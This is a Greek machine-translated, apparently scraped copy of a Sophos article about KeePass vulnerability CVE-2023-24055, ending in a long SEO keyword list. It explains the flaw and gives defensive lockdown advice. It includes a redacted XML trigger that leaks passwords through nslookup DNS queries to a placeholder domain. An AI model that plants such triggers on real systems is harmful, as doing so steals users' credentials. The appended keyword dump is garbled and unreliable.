Ήταν λίγες εβδομάδες άξιες ειδήσεων για τους διαχειριστές κωδικών πρόσβασης – αυτά τα εύχρηστα βοηθητικά προγράμματα που σας βοηθούν να βρείτε έναν διαφορετικό κωδικό πρόσβασης για κάθε ιστότοπο που χρησιμοποιείτε και, στη συνέχεια, να τα παρακολουθείτε όλα.
Στα τέλη του 2022, ήταν η σειρά του LastPass να είναι όλα τα νέα, όταν η εταιρεία παραδέχτηκε τελικά ότι μια παραβίαση που υπέστη τον Αύγουστο του 2022 όντως κατέληξε στον κωδικό πρόσβασης των πελατών τα θησαυροφυλάκια που κλέβονται από την υπηρεσία cloud όπου δημιουργήθηκαν αντίγραφα ασφαλείας.
(Οι ίδιοι οι κωδικοί πρόσβασης δεν κλάπηκαν, επειδή τα θησαυροφυλάκια ήταν κρυπτογραφημένα και το LastPass δεν είχε αντίγραφα του «κύριο κλειδιού» κανενός για τα ίδια τα αρχεία του θησαυροφυλάκιου αντιγράφων ασφαλείας, αλλά ήταν πιο προσεκτικό από ό,τι άκουσαν οι περισσότεροι άνθρωποι.)
Έπειτα, ήταν η σειρά της LifeLock να είναι όλα τα νέα, όταν η εταιρεία προειδοποίησε για κάτι που έμοιαζε με εξάνθημα επιθέσεις εικασίας κωδικού πρόσβασης, πιθανότατα με βάση κωδικούς πρόσβασης που έχουν κλαπεί από έναν εντελώς διαφορετικό ιστότοπο, πιθανόν πριν από λίγο καιρό, και ίσως αγοράστηκε πρόσφατα στον σκοτεινό ιστό.
Το ίδιο το LifeLock δεν είχε παραβιαστεί, αλλά ορισμένοι από τους χρήστες του είχαν παραβιαστεί, χάρη στη συμπεριφορά κοινής χρήσης κωδικού πρόσβασης που προκλήθηκε από κινδύνους που μπορεί να μην θυμούνται καν ότι είχαν αναλάβει.
Οι ανταγωνιστές 1Password και BitWarden ήταν επίσης πρόσφατα στις ειδήσεις, με βάση αναφορές κακόβουλων διαφημίσεων, προφανώς άθελά τους από την Google, οι οποίες παρέσυραν πειστικά τους χρήστες σε αντίγραφα σελίδων σύνδεσης που αποσκοπούσαν στο ηλεκτρονικό ψάρεμα των στοιχείων του λογαριασμού τους.
Τώρα είναι η σειρά του KeePass στις ειδήσεις, αυτή τη φορά για ένα ακόμη ζήτημα κυβερνοασφάλειας: ένα υποτιθέμενο ευπάθεια, ο όρος της ορολογίας που χρησιμοποιείται για σφάλματα λογισμικού που οδηγούν σε τρύπες ασφάλειας στον κυβερνοχώρο, τις οποίες οι επιτιθέμενοι ενδέχεται να μπορούν να εκμεταλλευτούν για κακούς σκοπούς.
Η ανίχνευση κωδικού πρόσβασης έγινε εύκολη
Αναφερόμαστε σε αυτό ως α ευπάθεια εδώ επειδή έχει ένα επίσημο αναγνωριστικό σφάλματος, που εκδόθηκε από το Εθνικό Ινστιτούτο Προτύπων και Τεχνολογίας των ΗΠΑ.
Το σφάλμα έχει μεταγλωττιστεί CVE-2023-24055: Ο εισβολέας που έχει πρόσβαση εγγραφής στο αρχείο διαμόρφωσης XML [μπορεί] να αποκτήσει τους κωδικούς πρόσβασης καθαρού κειμένου προσθέτοντας έναν κανόνα εξαγωγής.
Ο ισχυρισμός σχετικά με τη δυνατότητα απόκτησης κωδικών πρόσβασης καθαρού κειμένου, δυστυχώς, είναι αληθινός.
Εάν έχω πρόσβαση εγγραφής στα προσωπικά σας αρχεία, συμπεριλαμβανομένων των λεγόμενων σας %APPDATA%
κατάλογο, μπορώ να τροποποιήσω κρυφά την ενότητα διαμόρφωσης για να τροποποιήσω τυχόν ρυθμίσεις του KeePass που έχετε ήδη προσαρμόσει ή να προσθέσω προσαρμογές εάν δεν έχετε αλλάξει εν γνώσει σας τίποτα…
…και μπορώ παραδόξως εύκολα να κλέψω τους κωδικούς πρόσβασης απλού κειμένου, είτε μαζικά, για παράδειγμα απορρίπτοντας ολόκληρη τη βάση δεδομένων ως μη κρυπτογραφημένο αρχείο CSV, είτε καθώς τους χρησιμοποιείτε, για παράδειγμα ορίζοντας ένα «άγκιστρο προγράμματος» που ενεργοποιείται κάθε φορά που αποκτάτε πρόσβαση σε κωδικό πρόσβασης από τη βάση δεδομένων.
Σημειώστε ότι δεν χρειάζομαι Διαχειριστής προνόμια, επειδή δεν χρειάζεται να μπλέξω με τον πραγματικό κατάλογο εγκατάστασης όπου αποθηκεύεται η εφαρμογή KeePass, ο οποίος είναι συνήθως εκτός ορίων για τους τακτικούς χρήστες
Και δεν χρειάζομαι πρόσβαση σε καμία κλειδωμένη καθολική ρύθμιση παραμέτρων.
Είναι ενδιαφέρον ότι το KeePass καταβάλλει κάθε δυνατή προσπάθεια για να σταματήσει να μυρίζονται οι κωδικοί πρόσβασής σας όταν τους χρησιμοποιείτε, συμπεριλαμβανομένης της χρήσης τεχνικών προστασίας από παραβιάσεις για να σταματήσουν διάφορα κόλπα κατά του keylogger ακόμη και από χρήστες που έχουν ήδη εξουσίες sysadmin.
Αλλά το λογισμικό KeePass καθιστά επίσης εκπληκτικά εύκολη τη λήψη δεδομένων κωδικού πρόσβασης απλού κειμένου, ίσως με τρόπους που μπορεί να θεωρήσετε «πολύ εύκολο», ακόμη και για μη διαχειριστές.
Ήταν ένα λεπτό δουλειά για να χρησιμοποιήσετε το γραφικό περιβάλλον KeePass για να δημιουργήσετε ένα Σκανδάλη συμβάν για να εκτελείται κάθε φορά που αντιγράφετε έναν κωδικό πρόσβασης στο πρόχειρο και να ρυθμίζετε αυτό το συμβάν να πραγματοποιεί αναζήτηση DNS που περιλάμβανε τόσο το όνομα χρήστη όσο και τον εν λόγω κωδικό πρόσβασης απλού κειμένου:
Στη συνέχεια, θα μπορούσαμε να αντιγράψουμε την όχι τρομερά προφανή ρύθμιση XML για αυτήν την επιλογή από το δικό μας τοπικό αρχείο διαμόρφωσης στο αρχείο διαμόρφωσης ενός άλλου χρήστη στο σύστημα, μετά από το οποίο και αυτοί θα έβρισκαν τη διαρροή των κωδικών πρόσβασής τους μέσω του Διαδικτύου μέσω αναζητήσεων DNS.
Παρόλο που τα δεδομένα διαμόρφωσης XML είναι σε μεγάλο βαθμό αναγνώσιμα και ενημερωτικά, το KeePass χρησιμοποιεί περιέργως τυχαίες συμβολοσειρές δεδομένων γνωστές ως GUID (συντομογραφία του παγκοσμίως μοναδικά αναγνωριστικά) για να δηλώσετε τα διάφορα Σκανδάλη ρυθμίσεις, έτσι ώστε ακόμη και ένας καλά ενημερωμένος χρήστης να χρειάζεται μια εκτενή λίστα αναφοράς για να κατανοήσει ποιοι κανόνες ενεργοποίησης ορίζονται και πώς.
Δείτε πώς φαίνεται το έναυσμα διαρροής DNS, αν και τροποποιήσαμε ορισμένες από τις λεπτομέρειες, ώστε να μην μπορείτε να αντιμετωπίσετε κανένα άμεσο κακό, απλώς αντιγράφοντας και επικολλώντας απευθείας αυτό το κείμενο:
XXXXXXXXXXXXXXXXXXXXX αντίγραφο Κλέψτε πράγματα μέσω αναζητήσεων DNS XXXXXXXXXXXXXXXXXXXXX 0XXXXXXXXXXXXXXXXXXXXX nslookup XXXXX.XXXXXX.blah.test Αληθής 1
Με αυτήν την ενεργοποίηση ενεργή, η πρόσβαση σε έναν κωδικό πρόσβασης KeePass προκαλεί τη διαρροή του απλού κειμένου σε μια διακριτική αναζήτηση DNS σε έναν τομέα της επιλογής μου, η οποία είναι blah.test
σε αυτό το παράδειγμα.
Λάβετε υπόψη ότι οι πραγματικοί εισβολείς είναι σχεδόν βέβαιο ότι θα ανακάμψουν ή θα συσκότιζαν το κλεμμένο κείμενο, κάτι που όχι μόνο θα καθιστούσε πιο δύσκολο τον εντοπισμό πότε συνέβαιναν διαρροές DNS, αλλά θα φρόντιζαν επίσης τους κωδικούς πρόσβασης που περιέχουν χαρακτήρες που δεν είναι ASCII, όπως τονισμένα γράμματα ή emoji. που δεν μπορούν να χρησιμοποιηθούν διαφορετικά σε ονόματα DNS:
Αλλά είναι πραγματικά ένα σφάλμα;
Το δύσκολο ερώτημα, ωστόσο, είναι: "Είναι πραγματικά ένα σφάλμα ή είναι απλώς ένα ισχυρό χαρακτηριστικό που θα μπορούσε να γίνει κατάχρηση από κάποιον που θα χρειαζόταν ήδη τουλάχιστον τόσο πολύ έλεγχο στα προσωπικά σας αρχεία όσο εσείς;"
Με απλά λόγια, είναι ευπάθεια εάν κάποιος που έχει ήδη τον έλεγχο του λογαριασμού σας μπορεί να μπλέξει με αρχεία στα οποία υποτίθεται ότι μπορεί να έχει πρόσβαση ο λογαριασμός σας ούτως ή άλλως;
Παρόλο που μπορεί να ελπίζετε ότι ένας διαχειριστής pssword θα περιλάμβανε πολλά επιπλέον επίπεδα προστασίας από παραβίαση για να καταστήσει δυσκολότερη την κατάχρηση σφαλμάτων/λειτουργιών αυτού του είδους, CVE-2023-24055 είναι όντως μια ευπάθεια καταχωρισμένη στο CVE;
Αν ναι, δεν θα εντολές όπως DEL
(διαγραφή αρχείου) και FORMAT
πρέπει να είναι και "κουφάκια";
Και δεν θα ήταν η ίδια η ύπαρξη του PowerShell, που καθιστά πολύ πιο εύκολο να προκληθεί η δυνητικά επικίνδυνη συμπεριφορά (δοκιμάστε powerhsell get-clipboard
, για παράδειγμα), να είναι μια ευπάθεια μόνη της;
Αυτή είναι η θέση του KeePass, η οποία αναγνωρίζεται από το ακόλουθο κείμενο που έχει προστεθεί στο Λεπτομέρεια "σφαλμάτων". στον ιστότοπο του NIST:
** ΔΙΑΣΦΑΛΙΣΜΕΝΟ ** [...] ΣΗΜΕΙΩΣΗ: Η θέση του προμηθευτή είναι ότι η βάση δεδομένων κωδικών πρόσβασης δεν προορίζεται να είναι ασφαλής έναντι ενός εισβολέα που έχει αυτό το επίπεδο πρόσβασης στον τοπικό υπολογιστή.
Τι να κάνω;
Εάν είστε αυτόνομος χρήστης του KeePass, μπορείτε να ελέγξετε για αδίστακτους ενεργοποιητές όπως το "DNS Stealer" που δημιουργήσαμε παραπάνω ανοίγοντας την εφαρμογή KeePass και μελετώντας το Εργαλεία > Ενεργοποιητές… παράθυρο:
Σημειώστε ότι μπορείτε να γυρίσετε ολόκληρο Σκανδάλη το σύστημα απενεργοποιείται από αυτό το παράθυρο, απλώς αποεπιλέγοντας το [ ] Enable trigger system
επιλογή…
…αλλά αυτή δεν είναι μια καθολική ρύθμιση, επομένως μπορεί να ενεργοποιηθεί ξανά μέσω του τοπικού σας αρχείου διαμόρφωσης, και επομένως σας προστατεύει μόνο από λάθη και όχι από έναν εισβολέα με πρόσβαση στον λογαριασμό σας.
Μπορείτε να αναγκάσετε να απενεργοποιήσετε την επιλογή για όλους στον υπολογιστή, χωρίς να την ενεργοποιήσουν ξανά μόνοι τους, τροποποιώντας το καθολικό αρχείο "lockdown" KeePass.config.enforced.XML
, βρίσκεται στον κατάλογο όπου είναι εγκατεστημένο το ίδιο το πρόγραμμα της εφαρμογής.
Οι κανόνες ετικέτας θα απενεργοποιηθούν για όλους, εάν το παγκόσμιο αρχείο επιβολής XML μοιάζει με αυτό:
ψευδής
(Σε περίπτωση που αναρωτιέστε, ένας εισβολέας που έχει πρόσβαση εγγραφής στον κατάλογο της εφαρμογής για να αντιστρέψει αυτήν την αλλαγή θα έχει σχεδόν σίγουρα αρκετή ισχύ σε επίπεδο συστήματος για να τροποποιήσει το ίδιο το εκτελέσιμο αρχείο KeePass ή να εγκαταστήσει και να ενεργοποιήσει ένα αυτόνομο keylogger ούτως ή άλλως.)
Εάν είστε διαχειριστής δικτύου που έχει επιφορτιστεί με το κλείδωμα του KeePass στους υπολογιστές των χρηστών σας, ώστε να είναι ακόμα αρκετά ευέλικτο για να τους βοηθάει, αλλά όχι αρκετά ευέλικτο ώστε να βοηθούν τους εγκληματίες του κυβερνοχώρου κατά λάθος, συνιστούμε να διαβάσετε το KeePass Θέματα ασφάλειας σελίδα, το ωθήσεις σελίδα, και το Επιβαλλόμενη διαμόρφωση .
- SEO Powered Content & PR Distribution. Ενισχύστε σήμερα.
- Platoblockchain. Web3 Metaverse Intelligence. Ενισχύθηκε η γνώση. Πρόσβαση εδώ.
- πηγή: https://nakedsecurity.sophos.com/2023/02/01/password-stealing-vulnerability-reported-in-keypass-bug-or-feature/
- 1
- 2022
- 70
- a
- Ικανός
- Σχετικα
- πάνω από
- Απόλυτος
- πρόσβαση
- πρόσβαση
- Λογαριασμός
- ενεργός
- προστιθέμενη
- παράδεκτος
- διαφημίσεις
- Μετά το
- κατά
- Όλα
- υποτιθεμένος
- ήδη
- και
- Άλλος
- app
- Εφαρμογή
- Αύγουστος
- συγγραφέας
- αυτόματη
- πίσω
- υποστηρίζεται
- background-image
- εφεδρικός
- βασίζονται
- επειδή
- είναι
- σύνορο
- Κάτω μέρος
- παραβίαση
- Έντομο
- σφάλματα
- πιάνω
- ο οποίος
- περίπτωση
- προκαλούνται
- αίτια
- Κέντρο
- σίγουρα
- αλλαγή
- χαρακτήρες
- έλεγχος
- επιλογή
- ισχυρισμός
- πιο κοντά
- Backup
- χρώμα
- Ελάτε
- εταίρα
- εντελώς
- υπολογιστή
- υπολογιστές
- Συνθήκες
- διαμόρφωση
- Εξετάστε
- έλεγχος
- αντίγραφα
- θα μπορούσε να
- κάλυμμα
- δημιουργία
- δημιουργήθηκε
- CVE
- εγκληματίες του κυβερνοχώρου
- Κυβερνασφάλεια
- Επικίνδυνες
- σκοτάδι
- Dark Web
- ημερομηνία
- βάση δεδομένων
- καθέκαστα
- DID
- διαφορετικές
- κατευθείαν
- Display
- dns
- τομέα
- Μην
- κάτω
- μεταγλωττισμένο
- ευκολότερη
- εύκολα
- είτε
- κρυπτογραφημένα
- επιβολή
- αρκετά
- Ολόκληρος
- Even
- Συμβάν
- Κάθε
- όλοι
- παράδειγμα
- Εκμεταλλεύομαι
- εξαγωγή
- εκτενής
- επιπλέον
- Χαρακτηριστικό
- λίγοι
- Αρχεία
- Αρχεία
- Τελικά
- Εύρεση
- εύκαμπτος
- Εξής
- Δύναμη
- Βρέθηκαν
- από
- παίρνω
- να πάρει
- Παγκόσμιο
- πηγαίνει
- κινητός
- ευτυχισμένος
- που έχει
- ύψος
- βοήθεια
- εδώ
- Τρύπες
- ελπίζω
- φτερουγίζω
- Πως
- Ωστόσο
- HTML
- HTTPS
- αναγνωριστικό
- άμεσος
- in
- περιλαμβάνουν
- περιλαμβάνονται
- Συμπεριλαμβανομένου
- πληροφοριακός
- εγκαθιστώ
- παράδειγμα
- Ινστιτούτο
- Internet
- ζήτημα
- Εκδόθηκε
- IT
- εαυτό
- ορολογία
- Διατήρηση
- γνωστός
- σε μεγάλο βαθμό
- LastPass
- στρώματα
- οδηγήσει
- διαρροή
- Διαρροές
- Επίπεδο
- Λιστα
- τοπικός
- κοίταξε
- ΦΑΊΝΕΤΑΙ
- αναζήτηση
- που
- κάνω
- ΚΑΝΕΙ
- διευθυντής
- Διευθυντές
- Περιθώριο
- max-width
- ενδέχεται να
- λάθος
- λάθη
- τροποποιήσει
- πλέον
- ονόματα
- εθνικός
- Ανάγκη
- δίκτυο
- νέα
- nist
- κανονικός
- αποκτήσει
- επίσημος ανώτερος υπάλληλος
- άνοιγμα
- Επιλογή
- αλλιώς
- δική
- παράμετρος
- Κωδικός Πρόσβασης
- Κωδικοί πρόσβασης
- Παύλος
- PC
- People
- ίσως
- προσωπικός
- Phishing
- Απλό κείμενο
- Πλάτων
- Πληροφορία δεδομένων Plato
- Πλάτωνα δεδομένα
- θέση
- Δημοσιεύσεις
- ενδεχομένως
- δύναμη
- ισχυρός
- αρμοδιότητες
- PowerShell
- ιδιωτικός
- προνόμια
- πιθανώς
- Πρόγραμμα
- αγοράσει
- σκοποί
- βάζω
- ερώτηση
- τυχαίος
- εξάνθημα
- Ανάγνωση
- πρόσφατα
- συνιστώ
- τακτικός
- θυμάμαι
- απάντηση
- αναφέρθηκαν
- Εκθέσεις
- αντιστρέψει
- κινδύνους
- τρέξιμο
- Τμήμα
- προστατευμένο περιβάλλον
- αίσθηση
- υπηρεσία
- σειρά
- τον καθορισμό
- ρυθμίσεις
- Κοντά
- θα πρέπει να
- απλά
- So
- λογισμικό
- στέρεο
- μερικοί
- Κάποιος
- Spot
- αυτόνομο
- πρότυπα
- Ακόμη
- κλαπεί
- στάση
- αποθηκεύονται
- τέτοιος
- υποτιθεμένος
- SVG
- σύστημα
- Πάρτε
- τεχνικές
- Τεχνολογία
- Η
- τους
- τους
- επομένως
- Μέσω
- ώρα
- προς την
- πολύ
- κορυφή
- τροχιά
- μετάβαση
- διαφανής
- ενεργοποιούν
- αληθής
- ΣΤΡΟΦΗ
- Γύρισε
- συνήθως
- μοναδικός
- URL
- us
- χρήση
- Χρήστες
- Χρήστες
- επιχειρήσεις κοινής ωφέλειας
- διάφορα
- Θόλος
- θόλους
- μέσω
- ευπάθεια
- W3
- τρόπους
- ιστός
- Ιστοσελίδα : www.example.gr
- Εβδ.
- Τι
- Ποιό
- Ο ΟΠΟΊΟΣ
- θα
- Αναρωτιούνται
- Εργασία
- θα
- γράφω
- XML
- Σας
- τον εαυτό σας
- zephyrnet